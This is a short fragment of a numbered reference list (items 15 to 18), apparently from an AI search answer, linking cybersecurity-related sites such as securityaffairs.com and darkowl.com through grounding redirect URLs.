15. [redsentry.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEGzEAopDM7OzMq1ADc7LOFZ8PcoJKKZI3Y16vgIx-cAjfU6_05CBHEaFe9qO5MuTE6oTB46zNcYVkpXt0s3Ni0Qv8QpWCuiAjvACRzJzORpRNLQEE8h8_yS52Qg7qwz3ZdMDWgZbUCyvMKtfg84YjD2LGFsAtQunrKzlt_-gys83HZSbs2piBnG5Gg3hfCYUg7wMpu8vLhwA7r74cdksbVrWcS)
16. [telefonicatech.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQE1jkOBFjUo1pdpSA1hTARr9QLTUKA0auUMKY9MX2WRtfGMQ52uKSLUuW6wsubXIX8xpdu54bH-ccb_2C_oatWx7_CWZLmQ96dAMvZN9E4sKZ1-w4ZkRzUg0703qprlAHy70Tnn6xV3Aj40JW02lw==)
17. [securityaffairs.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQG3cKgVqOk4UTeaKC5rDNswOf3cxMGMVq0RkMXZXV2bN5QzojiYFeNrkMuxXnk3Dgn1GWRCA_QtLkY6pJGBGZekVKy6ZEa86x6uLiMAFsfx3LHDwmxLlp2ixQRIN24gxdTtcchcCYy8Tl1Fx4f-qLuEm0MDtvL-F6-lY6cnbYt5wRCaL-gfSb_E2ocVShJOTGp1pYc=)
18. [darkowl.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF3XfQdRbg_bJFEaTGftIkcBfL6qQbLbzPZvw0IJyi8sSwqiz7EZNOHoVVpRk_MAPlwf-yLnCcihMisVGxgte6--6aZzBPVP14aOHyqploaU7U2SEXs8Ex9VYCjDPQbPrL0xkau5hQUkc96m0s94Ey7K7riCOm5IKU=)